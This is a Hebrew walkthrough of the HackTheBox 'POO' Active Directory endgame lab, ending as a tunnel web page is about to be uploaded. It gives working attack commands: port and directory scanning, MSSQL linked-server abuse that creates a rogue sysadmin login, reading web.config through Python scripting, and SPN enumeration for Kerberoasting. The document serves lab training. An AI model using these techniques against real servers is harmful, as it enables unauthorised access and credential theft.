HackTheBoxendgame. ืžืขื‘ืจ ื”ืžืขื‘ื“ื” ืžื‘ืฆืขื™ื ื”ืชืงืคื™ื™ื ืžืงืฆื•ืขื™ื™ื. Pentest Active Directory

HackTheBoxendgame. ืžืขื‘ืจ ื”ืžืขื‘ื“ื” ืžื‘ืฆืขื™ื ื”ืชืงืคื™ื™ื ืžืงืฆื•ืขื™ื™ื. Pentest Active Directory

ื‘ืžืืžืจ ื–ื” ื ื ืชื— ืืช ื”ืžืขื‘ืจ ืฉืœ ืœื ืจืง ืžื›ื•ื ื”, ืืœื ืžื™ื ื™ ืžืขื‘ื“ื” ืฉืœืžื” ืžื”ืืชืจ HackTheBox.

ื›ืคื™ ืฉืฆื•ื™ืŸ ื‘ืชื™ืื•ืจ, POO ื ื•ืขื“ ืœื‘ื“ื•ืง ืžื™ื•ืžื ื•ื™ื•ืช ื‘ื›ืœ ืฉืœื‘ื™ ื”ื”ืชืงืคื•ืช ื‘ืกื‘ื™ื‘ืช Active Directory ืงื˜ื ื”. ื”ืžื˜ืจื” ื”ื™ื ืœืกื›ืŸ ืžืืจื— ื–ืžื™ืŸ, ืœื”ืกืœื™ื ื”ืจืฉืื•ืช, ื•ื‘ืกื•ืคื• ืฉืœ ื“ื‘ืจ ืœืกื›ืŸ ืืช ื›ืœ ื”ื“ื•ืžื™ื™ืŸ ืขืœ ื™ื“ื™ ืื™ืกื•ืฃ 5 ื“ื’ืœื™ื ื‘ืชื”ืœื™ืš.

ื”ื—ื™ื‘ื•ืจ ืœืžืขื‘ื“ื” ื”ื•ื ื‘ืืžืฆืขื•ืช VPN. ืžื•ืžืœืฅ ืœื ืœื”ืชื—ื‘ืจ ืžืžื—ืฉื‘ ืขื•ื‘ื“ ืื• ืžืืจื— ืฉื™ืฉ ื‘ื• ื ืชื•ื ื™ื ื—ืฉื•ื‘ื™ื ืขื‘ื•ืจื›ื, ืžื›ื™ื•ื•ืŸ ืฉืืชื ื ื›ื ืกื™ื ืœืจืฉืช ืคืจื˜ื™ืช ืขื ืื ืฉื™ื ืฉื™ื•ื“ืขื™ื ืžืฉื”ื• ืขืœ ืื‘ื˜ื—ืช ืžื™ื“ืข ๐Ÿ™‚

ืžื™ื“ืข ืืจื’ื•ื ื™
ื›ื“ื™ ืœืขื–ื•ืจ ืœืš ืœื”ื™ืฉืืจ ืžืขื•ื“ื›ืŸ ื‘ืžืืžืจื™ื ื—ื“ืฉื™ื, ืชื•ื›ื ื•ืช ื•ืžื™ื“ืข ืื—ืจ, ื™ืฆืจืชื™ ืขืจื•ืฅ ืžื‘ืจืง ะธ ืงื‘ื•ืฆื” ืœื“ื•ืŸ ื‘ื›ืœ ื ื•ืฉื ื‘ืื–ื•ืจ IIKB. ื’ื ื”ื‘ืงืฉื•ืช ื”ืื™ืฉื™ื•ืช, ื”ืฉืืœื•ืช, ื”ื”ืฆืขื•ืช ื•ื”ื”ืžืœืฆื•ืช ืฉืœืš ืื ื™ ืืกืชื›ืœ ื•ืืขื ื” ืœื›ื•ืœื..

ื›ืœ ื”ืžื™ื“ืข ื ื™ืชืŸ ืœืžื˜ืจื•ืช ื—ื™ื ื•ื›ื™ื•ืช ื‘ืœื‘ื“. ืžื—ื‘ืจ ืžืกืžืš ื–ื” ืื™ื ื• ื ื•ืฉื ื‘ืื—ืจื™ื•ืช ืœื›ืœ ื ื–ืง ืฉื™ื™ื’ืจื ืœืื™ืฉ ื›ืชื•ืฆืื” ืžืฉื™ืžื•ืฉ ื‘ื™ื“ืข ื•ื‘ืฉื™ื˜ื•ืช ืฉื”ื•ืฉื’ื• ื›ืชื•ืฆืื” ืžืขื™ื•ืŸ ื‘ืžืกืžืš ื–ื”.

ืžื‘ื•ื

ืžืฉื—ืง ื”ืงืฆื” ื”ื–ื” ืžื•ืจื›ื‘ ืžืฉืชื™ ืžื›ื•ื ื•ืช ื•ืžื›ื™ืœ 5 ื“ื’ืœื™ื.

HackTheBoxendgame. ืžืขื‘ืจ ื”ืžืขื‘ื“ื” ืžื‘ืฆืขื™ื ื”ืชืงืคื™ื™ื ืžืงืฆื•ืขื™ื™ื. Pentest Active Directory

ื ื™ืชืŸ ื’ื ืชื™ืื•ืจ ื•ื›ืชื•ื‘ืช ืฉืœ ื”ืžืืจื— ื”ื–ืžื™ืŸ.

HackTheBoxendgame. ืžืขื‘ืจ ื”ืžืขื‘ื“ื” ืžื‘ืฆืขื™ื ื”ืชืงืคื™ื™ื ืžืงืฆื•ืขื™ื™ื. Pentest Active Directory

ื‘ื•ืื• ื ืชื—ื™ืœ!

ื“ื’ืœ ืจื™ืงื•ืŸ

ืœืžื—ืฉื‘ ื”ื–ื” ื™ืฉ ื›ืชื•ื‘ืช IP ืฉืœ 10.13.38.11 ืฉืื•ืชื” ืื ื™ ืžื•ืกื™ืฃ ืœ-/etc/hosts.
10.13.38.11 poo.htb

ื”ืฉืœื‘ ื”ืจืืฉื•ืŸ ื”ื•ื ืกืจื™ืงืช ื™ืฆื™ืื•ืช ืคืชื•ื—ื•ืช. ืžื›ื™ื•ื•ืŸ ืฉืœื•ืงื— ื”ืจื‘ื” ื–ืžืŸ ืœืกืจื•ืง ืืช ื›ืœ ื”ืคื•ืจื˜ื™ื ืขื nmap, ืื ื™ ืืขืฉื” ืืช ื–ื” ืงื•ื“ื ื›ืœ ืขื masscan. ืื ื• ืกื•ืจืงื™ื ืืช ื›ืœ ื™ืฆื™ืื•ืช ื”-TCP ื•ื”-UDP ืžืžืžืฉืง tun0 ื‘-500 ืขืžื•ื“ื™ื ืœืฉื ื™ื™ื”.

sudo masscan -e tun0 -p1-65535,U:1-65535 10.13.38.11 --rate=500

HackTheBoxendgame. ืžืขื‘ืจ ื”ืžืขื‘ื“ื” ืžื‘ืฆืขื™ื ื”ืชืงืคื™ื™ื ืžืงืฆื•ืขื™ื™ื. Pentest Active Directory

ื›ืขืช, ื›ื“ื™ ืœืงื‘ืœ ืžื™ื“ืข ืžืคื•ืจื˜ ื™ื•ืชืจ ืขืœ ื”ืฉื™ืจื•ืชื™ื ื”ืคื•ืขืœื™ื ืขืœ ื”ืคื•ืจื˜ื™ื, ื‘ื•ืื• ื ืจื™ืฅ ืกืจื™ืงื” ืขื ืืคืฉืจื•ืช -A.

nmap -A poo.htb -p80,1433

HackTheBoxendgame. ืžืขื‘ืจ ื”ืžืขื‘ื“ื” ืžื‘ืฆืขื™ื ื”ืชืงืคื™ื™ื ืžืงืฆื•ืขื™ื™ื. Pentest Active Directory

ืœืคื™ื›ืš, ื™ืฉ ืœื ื• ืฉื™ืจื•ืชื™ IIS ื•-MSSQL. ื‘ืžืงืจื” ื–ื”, ื ื’ืœื” ืืช ืฉื ื”-DNS ื”ืืžื™ืชื™ ืฉืœ ื”ื“ื•ืžื™ื™ืŸ ื•ื”ืžื—ืฉื‘. ื‘ืฉืจืช ื”ืื™ื ื˜ืจื ื˜, ืžืงื‘ืœ ืืช ืคื ื™ื ื• ืขืžื•ื“ ื”ื‘ื™ืช ืฉืœ IIS.

HackTheBoxendgame. ืžืขื‘ืจ ื”ืžืขื‘ื“ื” ืžื‘ืฆืขื™ื ื”ืชืงืคื™ื™ื ืžืงืฆื•ืขื™ื™ื. Pentest Active Directory

ื‘ื•ืื• ื ืขื‘ื•ืจ ืขืœ ื”ืžื“ืจื™ื›ื™ื. ืื ื™ ืžืฉืชืžืฉ ื‘ื’ื•ื‘ืืกื˜ืจ ื‘ืฉื‘ื™ืœ ื–ื”. ื‘ืคืจืžื˜ืจื™ื ืื ื• ืžืฆื™ื™ื ื™ื ืืช ืžืกืคืจ ื”ื–ืจืžื™ื 128 (-t), URL (-u), ืžื™ืœื•ืŸ (-w) ื•ื”ืจื—ื‘ื•ืช ืฉืžืขื ื™ื™ื ื™ื ืื•ืชื ื• (-x).

gobuster dir -t 128 -u poo.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php,aspx,html

HackTheBoxendgame. ืžืขื‘ืจ ื”ืžืขื‘ื“ื” ืžื‘ืฆืขื™ื ื”ืชืงืคื™ื™ื ืžืงืฆื•ืขื™ื™ื. Pentest Active Directory

ืœืคื™ื›ืš, ื™ืฉ ืœื ื• ืื™ืžื•ืช HTTP ืขื‘ื•ืจ ืกืคืจื™ื™ืช /admin, ื›ืžื• ื’ื ืืช ืงื•ื‘ืฅ ื”ืื—ืกื•ืŸ ืฉืœ ืฉื™ืจื•ืช ืฉื•ืœื—ืŸ ื”ืขื‘ื•ื“ื” DS_Store ื–ืžื™ืŸ. DS_Store ื”ื ืงื‘ืฆื™ื ื”ืžืื—ืกื ื™ื ื”ื’ื“ืจื•ืช ืžืฉืชืžืฉ ืขื‘ื•ืจ ืชื™ืงื™ื”, ื›ื’ื•ืŸ ืจืฉื™ืžืช ืงื‘ืฆื™ื, ืžื™ืงื•ื ืื™ื™ืงื•ื ื™ื, ืชืžื•ื ืช ืจืงืข ืฉื ื‘ื—ืจื”. ืงื•ื‘ืฅ ื›ื–ื” ืขืœื•ืœ ืœื”ื’ื™ืข ืœืกืคืจื™ื™ืช ืฉืจืช ื”ืื™ื ื˜ืจื ื˜ ืฉืœ ืžืคืชื—ื™ ืืชืจื™ื. ื›ืš, ืื ื• ืžืงื‘ืœื™ื ืžื™ื“ืข ืขืœ ืชื•ื›ืŸ ื”ืžื“ืจื™ืš. ื‘ืฉื‘ื™ืœ ื–ื” ืืชื” ื™ื›ื•ืœ ืœื”ืฉืชืžืฉ ืกื•ืจืง DS_Store.

python3 dsstore_crawler.py -i http://poo.htb/

HackTheBoxendgame. ืžืขื‘ืจ ื”ืžืขื‘ื“ื” ืžื‘ืฆืขื™ื ื”ืชืงืคื™ื™ื ืžืงืฆื•ืขื™ื™ื. Pentest Active Directory

ืื ื• ืžืงื‘ืœื™ื ืืช ืชื•ื›ืŸ ื”ืžื“ืจื™ืš. ื”ื“ื‘ืจ ื”ืžืขื ื™ื™ืŸ ื‘ื™ื•ืชืจ ื›ืืŸ ื”ื•ื ืกืคืจื™ื™ืช /dev, ืžืžื ื” ืื ื• ื™ื›ื•ืœื™ื ืœืจืื•ืช ืืช ื”ืžืงื•ืจื•ืช ื•ืงื‘ืฆื™ db ื‘ืฉื ื™ ืขื ืคื™ื. ืื‘ืœ ืื ื—ื ื• ื™ื›ื•ืœื™ื ืœื”ืฉืชืžืฉ ื‘-6 ื”ืชื•ื•ื™ื ื”ืจืืฉื•ื ื™ื ืฉืœ ืฉืžื•ืช ื”ืงื‘ืฆื™ื ื•ื”ืกืคืจื™ื•ืช ืื ื”ืฉื™ืจื•ืช ืคื’ื™ืข ืœ- IIS ShortName. ืืชื” ื™ื›ื•ืœ ืœื‘ื“ื•ืง ืืช ื”ืคื’ื™ืขื•ืช ื”ื–ื• ื‘ืืžืฆืขื•ืช ืกื•ืจืง ืฉืžื•ืช ืงืฆืจื™ื ืฉืœ IIS.

HackTheBoxendgame. ืžืขื‘ืจ ื”ืžืขื‘ื“ื” ืžื‘ืฆืขื™ื ื”ืชืงืคื™ื™ื ืžืงืฆื•ืขื™ื™ื. Pentest Active Directory

ื•ืื ื—ื ื• ืžื•ืฆืื™ื ืงื•ื‘ืฅ ื˜ืงืกื˜ ืื—ื“ ืฉืžืชื—ื™ืœ ื‘-"poo_co". ืœื ื™ื“ืขืชื™ ืžื” ืœืขืฉื•ืช ื”ืœืื”, ืคืฉื•ื˜ ื‘ื—ืจืชื™ ืžืžื™ืœื•ืŸ ื”ืžื“ืจื™ื›ื™ื ืืช ื›ืœ ื”ืžื™ืœื™ื ืฉืžืชื—ื™ืœื•ืช ื‘-"co".

cat /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt | grep -i "^co" > co_words.txt

ื•ืชื—ื–ืจื™ ืขื wfuzz.

wfuzz -w ./co_words.txt -u "http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/db/poo_FUZZ.txt" --hc 404

HackTheBoxendgame. ืžืขื‘ืจ ื”ืžืขื‘ื“ื” ืžื‘ืฆืขื™ื ื”ืชืงืคื™ื™ื ืžืงืฆื•ืขื™ื™ื. Pentest Active Directory

ื•ืœืžืฆื•ื ืืช ื”ืžื™ืœื” ื”ื ื›ื•ื ื”! ืื ื• ืžืกืชื›ืœื™ื ืขืœ ื”ืงื•ื‘ืฅ ื”ื–ื”, ืฉื•ืžืจื™ื ืืช ื”ืื™ืฉื•ืจื™ื (ืื ืœืฉืคื•ื˜ ืœืคื™ ื”ืคืจืžื˜ืจ DBNAME, ื”ื ืž-MSSQL).

HackTheBoxendgame. ืžืขื‘ืจ ื”ืžืขื‘ื“ื” ืžื‘ืฆืขื™ื ื”ืชืงืคื™ื™ื ืžืงืฆื•ืขื™ื™ื. Pentest Active Directory

ืื ื—ื ื• ืžื•ืกืจื™ื ืืช ื”ื“ื’ืœ, ื•ืžืชืงื“ืžื™ื ื‘-20%.

HackTheBoxendgame. ืžืขื‘ืจ ื”ืžืขื‘ื“ื” ืžื‘ืฆืขื™ื ื”ืชืงืคื™ื™ื ืžืงืฆื•ืขื™ื™ื. Pentest Active Directory

ื”ื ื“ื’ืœ

ืื ื—ื ื• ืžืชื—ื‘ืจื™ื ืœ-MSSQL, ืื ื™ ืžืฉืชืžืฉ ื‘-DBeaver.

HackTheBoxendgame. ืžืขื‘ืจ ื”ืžืขื‘ื“ื” ืžื‘ืฆืขื™ื ื”ืชืงืคื™ื™ื ืžืงืฆื•ืขื™ื™ื. Pentest Active Directory

ืื ื—ื ื• ืœื ืžื•ืฆืื™ื ืžืฉื”ื• ืžืขื ื™ื™ืŸ ื‘ืžืกื“ ื”ื ืชื•ื ื™ื ื”ื–ื”, ื‘ื•ืื• ื ื™ืฆื•ืจ ืขื•ืจืš SQL ื•ื ื‘ื“ื•ืง ืžื”ื ื”ืžืฉืชืžืฉื™ื.

SELECT name FROM master..syslogins;

HackTheBoxendgame. ืžืขื‘ืจ ื”ืžืขื‘ื“ื” ืžื‘ืฆืขื™ื ื”ืชืงืคื™ื™ื ืžืงืฆื•ืขื™ื™ื. Pentest Active Directory

ื™ืฉ ืœื ื• ืฉื ื™ ืžืฉืชืžืฉื™ื. ื‘ื•ืื• ื ื‘ื“ื•ืง ืืช ื”ื”ืจืฉืื•ืช ืฉืœื ื•.

SELECT is_srvrolemember('sysadmin'), is_srvrolemember('dbcreator'), is_srvrolemember('bulkadmin'), is_srvrolemember('diskadmin'), is_srvrolemember('processadmin'), is_srvrolemember('serveradmin'), is_srvrolemember('setupadmin'), is_srvrolemember('securityadmin');

HackTheBoxendgame. ืžืขื‘ืจ ื”ืžืขื‘ื“ื” ืžื‘ืฆืขื™ื ื”ืชืงืคื™ื™ื ืžืงืฆื•ืขื™ื™ื. Pentest Active Directory

ืœืคื™ื›ืš, ืื™ืŸ ื”ืจืฉืื•ืช. ื‘ื•ื ื ืจืื” ืืช ื”ืฉืจืชื™ื ื”ืžืงื•ืฉืจื™ื, ื›ืชื‘ืชื™ ืขืœ ื”ื˜ื›ื ื™ืงื” ื”ื–ื• ื‘ืคื™ืจื•ื˜ ื›ืืŸ.

SELECT * FROM master..sysservers;

HackTheBoxendgame. ืžืขื‘ืจ ื”ืžืขื‘ื“ื” ืžื‘ืฆืขื™ื ื”ืชืงืคื™ื™ื ืžืงืฆื•ืขื™ื™ื. Pentest Active Directory

ืื– ืื ื—ื ื• ืžื•ืฆืื™ื SQL Server ืื—ืจ. ื‘ื•ืื• ื ื‘ื“ื•ืง ืืช ื‘ื™ืฆื•ืข ื”ืคืงื•ื“ื•ืช ื‘ืฉืจืช ื–ื” ื‘ืืžืฆืขื•ืช openquery().

SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'select @@version as version');

HackTheBoxendgame. ืžืขื‘ืจ ื”ืžืขื‘ื“ื” ืžื‘ืฆืขื™ื ื”ืชืงืคื™ื™ื ืžืงืฆื•ืขื™ื™ื. Pentest Active Directory

ื•ืื ื—ื ื• ืืคื™ืœื• ื™ื›ื•ืœื™ื ืœื‘ื ื•ืช ืขืฅ ืฉืื™ืœืชื•ืช.

SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT version FROM openquery("COMPATIBILITYPOO_PUBLIC", ''select @@version as version'');');

ื”ืขื•ื‘ื“ื” ื”ื™ื ืฉื›ืืฉืจ ืื ื• ืžื’ื™ืฉื™ื ื‘ืงืฉื” ืœืฉืจืช ืžืงื•ืฉืจ, ื”ื‘ืงืฉื” ืžื‘ื•ืฆืขืช ื‘ื”ืงืฉืจ ืฉืœ ืžืฉืชืžืฉ ืื—ืจ! ื‘ื•ื ื ืจืื” ืื™ื–ื” ื”ืงืฉืจ ืžืฉืชืžืฉ ืื ื—ื ื• ืžืจื™ืฆื™ื ื‘ืฉืจืช ื”ืžืงื•ืฉืจ.

SELECT name FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT user_name() as name');

HackTheBoxendgame. ืžืขื‘ืจ ื”ืžืขื‘ื“ื” ืžื‘ืฆืขื™ื ื”ืชืงืคื™ื™ื ืžืงืฆื•ืขื™ื™ื. Pentest Active Directory

ื•ืขื›ืฉื™ื• ื ืจืื” ื‘ืื™ื–ื” ื”ืงืฉืจ ืžื‘ื•ืฆืขืช ื”ื‘ืงืฉื” ืžื”ืฉืจืช ื”ืžืงื•ืฉืจ ืœืฉืœื ื•!

SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT name FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT user_name() as name'');');

HackTheBoxendgame. ืžืขื‘ืจ ื”ืžืขื‘ื“ื” ืžื‘ืฆืขื™ื ื”ืชืงืคื™ื™ื ืžืงืฆื•ืขื™ื™ื. Pentest Active Directory

ืœืคื™ื›ืš, ื–ื”ื• ื”ืงืฉืจ DBO ืฉื—ื™ื™ื‘ ืœืงื‘ืœ ืืช ื›ืœ ื”ื”ืจืฉืื•ืช. ื‘ื•ืื• ื ื‘ื“ื•ืง ืืช ื”ื”ืจืฉืื•ืช ื‘ืžืงืจื” ืฉืœ ื‘ืงืฉื” ืžืฉืจืช ืžืงื•ืฉืจ.

SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT * FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT is_srvrolemember(''''sysadmin''''), is_srvrolemember(''''dbcreator''''), is_srvrolemember(''''bulkadmin''''), is_srvrolemember(''''diskadmin''''), is_srvrolemember(''''processadmin''''), is_srvrolemember(''''serveradmin''''), is_srvrolemember(''''setupadmin''''), is_srvrolemember(''''securityadmin'''')'')');

HackTheBoxendgame. ืžืขื‘ืจ ื”ืžืขื‘ื“ื” ืžื‘ืฆืขื™ื ื”ืชืงืคื™ื™ื ืžืงืฆื•ืขื™ื™ื. Pentest Active Directory

ื›ืคื™ ืฉืืชื” ื™ื›ื•ืœ ืœืจืื•ืช, ื™ืฉ ืœื ื• ืืช ื›ืœ ื”ื”ืจืฉืื•ืช! ื‘ื•ืื• ื ื™ืฆื•ืจ ืืช ื”ืžื ื”ืœ ืฉืœื ื• ื›ื›ื”. ืื‘ืœ ื”ื ืœื ื ื•ืชื ื™ื ืœื”ื ืœืขื‘ื•ืจ openquery, ื‘ื•ืื• ื ืขืฉื” ืืช ื–ื” ื“ืจืš EXECUTE AT.

EXECUTE('EXECUTE(''CREATE LOGIN [ralf] WITH PASSWORD=N''''ralfralf'''', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''CREATE USER [ralf] FOR LOGIN [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER SERVER ROLE [sysadmin] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER ROLE [db_owner] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";

ื•ืขื›ืฉื™ื• ืื ื—ื ื• ืžืชื—ื‘ืจื™ื ืขื ื”ืื™ืฉื•ืจื™ื ืฉืœ ื”ืžืฉืชืžืฉ ื”ื—ื“ืฉ, ืฆืคื• ื‘ืžืกื“ ื”ื ืชื•ื ื™ื ื”ื—ื“ืฉ ืฉืœ ื”ื“ื’ืœื™ื.

HackTheBoxendgame. ืžืขื‘ืจ ื”ืžืขื‘ื“ื” ืžื‘ืฆืขื™ื ื”ืชืงืคื™ื™ื ืžืงืฆื•ืขื™ื™ื. Pentest Active Directory

ืื ื—ื ื• ืžื•ืกืจื™ื ืืช ื”ื“ื’ืœ ื”ื–ื” ื•ื”ื•ืœื›ื™ื ืจื—ื•ืง ื™ื•ืชืจ.

HackTheBoxendgame. ืžืขื‘ืจ ื”ืžืขื‘ื“ื” ืžื‘ืฆืขื™ื ื”ืชืงืคื™ื™ื ืžืงืฆื•ืขื™ื™ื. Pentest Active Directory

ื“ื’ืœ ื—ื–ืจื” ืœืื—ื•ืจ

ื‘ื•ื ื ืฉื™ื’ ืืช ื”ืžืขื˜ืคืช ื‘ืืžืฆืขื•ืช MSSQL, ืื ื™ ืžืฉืชืžืฉ ื‘-mssqlclient ืžื—ื‘ื™ืœืช impacket.

mssqlclient.py ralf:[email protected] -db POO_PUBLIC

HackTheBoxendgame. ืžืขื‘ืจ ื”ืžืขื‘ื“ื” ืžื‘ืฆืขื™ื ื”ืชืงืคื™ื™ื ืžืงืฆื•ืขื™ื™ื. Pentest Active Directory

ืื ื—ื ื• ืฆืจื™ื›ื™ื ืœื”ืฉื™ื’ ืกื™ืกืžืื•ืช, ื•ื”ื“ื‘ืจ ื”ืจืืฉื•ืŸ ืฉื›ื‘ืจ ืคื’ืฉื ื• ื”ื•ื ื”ืืชืจ. ืœืคื™ื›ืš, ืื ื• ื–ืงื•ืงื™ื ืœืชืฆื•ืจืช ืฉืจืช ืื™ื ื˜ืจื ื˜ (ืื™ ืืคืฉืจ ืœื–ืจื•ืง ืžืขื˜ืคืช ื ื•ื—ื”, ื›ื›ืœ ื”ื ืจืื” ื—ื•ืžืช ื”ืืฉ ืขื•ื‘ื“ืช).

HackTheBoxendgame. ืžืขื‘ืจ ื”ืžืขื‘ื“ื” ืžื‘ืฆืขื™ื ื”ืชืงืคื™ื™ื ืžืงืฆื•ืขื™ื™ื. Pentest Active Directory

ืื‘ืœ ื”ื’ื™ืฉื” ื ื“ื—ืชื”. ืœืžืจื•ืช ืฉืื ื—ื ื• ื™ื›ื•ืœื™ื ืœืงืจื•ื ืืช ื”ืงื•ื‘ืฅ ืž-MSSQL, ืื ื—ื ื• ืจืง ืฆืจื™ื›ื™ื ืœื“ืขืช ืื™ืœื• ืฉืคื•ืช ืชื›ื ื•ืช ืžื•ื’ื“ืจื•ืช. ื•ื‘ืกืคืจื™ื™ืช MSSQL ืื ื—ื ื• ืžื’ืœื™ื ืฉื™ืฉ Python.

HackTheBoxendgame. ืžืขื‘ืจ ื”ืžืขื‘ื“ื” ืžื‘ืฆืขื™ื ื”ืชืงืคื™ื™ื ืžืงืฆื•ืขื™ื™ื. Pentest Active Directory

ืื– ืื™ืŸ ื‘ืขื™ื” ืœืงืจื•ื ืืช ื”ืงื•ื‘ืฅ web.config.

EXEC sp_execute_external_script
@language = N'Python',
@script = "print(open('C:inetpubwwwrootweb.config').read())"

HackTheBoxendgame. ืžืขื‘ืจ ื”ืžืขื‘ื“ื” ืžื‘ืฆืขื™ื ื”ืชืงืคื™ื™ื ืžืงืฆื•ืขื™ื™ื. Pentest Active Directory

ืขื ื”ืื™ืฉื•ืจื™ื ืฉื ืžืฆืื•, ืขื‘ื•ืจ ืืœ /admin ื•ื”ืจื™ื ืืช ื”ื“ื’ืœ.

HackTheBoxendgame. ืžืขื‘ืจ ื”ืžืขื‘ื“ื” ืžื‘ืฆืขื™ื ื”ืชืงืคื™ื™ื ืžืงืฆื•ืขื™ื™ื. Pentest Active Directory

HackTheBoxendgame. ืžืขื‘ืจ ื”ืžืขื‘ื“ื” ืžื‘ืฆืขื™ื ื”ืชืงืคื™ื™ื ืžืงืฆื•ืขื™ื™ื. Pentest Active Directory

ื“ื’ืœ ื“ืจื™ืกืช ืจื’ืœ

ืœืžืขืฉื”, ื™ืฉื ืŸ ื›ืžื” ืื™ ื ื•ื—ื•ืช ืžืฉื™ืžื•ืฉ ื‘ื—ื•ืžืช ืืฉ, ืืš ื‘ื”ืกืชื›ืœื•ืช ืขืœ ื”ื’ื“ืจื•ืช ื”ืจืฉืช, ืื ื• ืžื‘ื—ื™ื ื™ื ื›ื™ ื ืขืฉื” ืฉื™ืžื•ืฉ ื’ื ื‘ืคืจื•ื˜ื•ืงื•ืœ IPv6!

HackTheBoxendgame. ืžืขื‘ืจ ื”ืžืขื‘ื“ื” ืžื‘ืฆืขื™ื ื”ืชืงืคื™ื™ื ืžืงืฆื•ืขื™ื™ื. Pentest Active Directory

ื‘ื•ืื• ื ื•ืกื™ืฃ ืืช ื”ื›ืชื•ื‘ืช ื”ื–ื• ืœ-/etc/hosts.
dead:babe::1001 poo6.htb
ื‘ื•ืื• ื ืกืจื•ืง ืืช ื”ืžืืจื— ืฉื•ื‘, ืื‘ืœ ื”ืคืขื ื‘ืืžืฆืขื•ืช IPv6.

HackTheBoxendgame. ืžืขื‘ืจ ื”ืžืขื‘ื“ื” ืžื‘ืฆืขื™ื ื”ืชืงืคื™ื™ื ืžืงืฆื•ืขื™ื™ื. Pentest Active Directory

ื•ืฉื™ืจื•ืช WinRM ื–ืžื™ืŸ ื‘ืืžืฆืขื•ืช IPv6. ื‘ื•ืื• ื ืชื—ื‘ืจ ืขื ื”ืื™ืฉื•ืจื™ื ืฉื ืžืฆืื•.

HackTheBoxendgame. ืžืขื‘ืจ ื”ืžืขื‘ื“ื” ืžื‘ืฆืขื™ื ื”ืชืงืคื™ื™ื ืžืงืฆื•ืขื™ื™ื. Pentest Active Directory

ื™ืฉ ื“ื’ืœ ืขืœ โ€‹โ€‹ืฉื•ืœื—ืŸ ื”ืขื‘ื•ื“ื”, ืžืกื•ืจ ืื•ืชื•.

HackTheBoxendgame. ืžืขื‘ืจ ื”ืžืขื‘ื“ื” ืžื‘ืฆืขื™ื ื”ืชืงืคื™ื™ื ืžืงืฆื•ืขื™ื™ื. Pentest Active Directory

ื“ื’ืœ P00ned

ืœืื—ืจ ืกื™ื•ืจ ืขืœ ื”ืžืืจื— ืขื ื—ื•ืžื•ืก ืื ื—ื ื• ืœื ืžื•ืฆืื™ื ืฉื•ื ื“ื‘ืจ ืžื™ื•ื—ื“. ื•ืื– ื”ื•ื—ืœื˜ ืœื—ืคืฉ ืฉื•ื‘ ืื™ืฉื•ืจื™ื (ื›ืชื‘ืชื™ ื’ื ืขืœ ื”ื ื•ืฉื ื”ื–ื” ืžืืžืจ). ืื‘ืœ ืœื ื”ืฆืœื—ืชื™ ืœืงื‘ืœ ืืช ื›ืœ ื”-SPNs ืžื”ืžืขืจื›ืช ื“ืจืš WinRM.

setspn.exe -T intranet.poo -Q */*

HackTheBoxendgame. ืžืขื‘ืจ ื”ืžืขื‘ื“ื” ืžื‘ืฆืขื™ื ื”ืชืงืคื™ื™ื ืžืงืฆื•ืขื™ื™ื. Pentest Active Directory

ื‘ื•ื ื ื‘ืฆืข ืืช ื”ืคืงื•ื“ื” ื‘ืืžืฆืขื•ืช MSSQL.

HackTheBoxendgame. ืžืขื‘ืจ ื”ืžืขื‘ื“ื” ืžื‘ืฆืขื™ื ื”ืชืงืคื™ื™ื ืžืงืฆื•ืขื™ื™ื. Pentest Active Directory

ื‘ื“ืจืš ื–ื•, ืื ื• ืžืงื‘ืœื™ื ืืช ื”-SPN ืฉืœ ื”ืžืฉืชืžืฉื™ื p00_hr ื•-p00_adm, ืžื” ืฉืื•ืžืจ ืฉื”ื ืคื’ื™ืขื™ื ืœื”ืชืงืคื” ื›ื’ื•ืŸ Kerberoasting. ื‘ืงื™ืฆื•ืจ, ืื ื—ื ื• ื™ื›ื•ืœื™ื ืœืงื‘ืœ ืืช ื”-hash ืฉืœ ื”ืกื™ืกืžืื•ืช ืฉืœื”ื.

ืจืืฉื™ืช ืขืœื™ืš ืœืงื‘ืœ ืžืขื˜ืคืช ื™ืฆื™ื‘ื” ืžื˜ืขื ืžืฉืชืžืฉ MSSQL. ืื‘ืœ ืžื›ื™ื•ื•ืŸ ืฉืื ื• ืžื•ื’ื‘ืœื™ื ื‘ื’ื™ืฉื”, ื™ืฉ ืœื ื• ืงืฉืจ ืขื ื”ืžืืจื— ืจืง ื“ืจืš ื™ืฆื™ืื•ืช 80 ื•-1433. ืื‘ืœ ืืคืฉืจ ืœื”ืขื‘ื™ืจ ืชื ื•ืขื” ื“ืจืš ื ืžืœ 80! ื‘ืฉื‘ื™ืœ ื–ื” ืื ื—ื ื• ืžืฉืชืžืฉื™ื ื”ื‘ืงืฉื” ื”ื‘ืื”. ื‘ื•ืื• ื ืขืœื” ืืช ื”ืงื•ื‘ืฅ tunnel.aspx ืœืกืคืจื™ื™ืช ื”ื‘ื™ืช ืฉืœ ืฉืจืช ื”ืื™ื ื˜ืจื ื˜ - C: inetpubwwwroot.

HackTheBoxendgame. ืžืขื‘ืจ ื”ืžืขื‘ื“ื” ืžื‘ืฆืขื™ื ื”ืชืงืคื™ื™ื ืžืงืฆื•ืขื™ื™ื. Pentest Active Directory

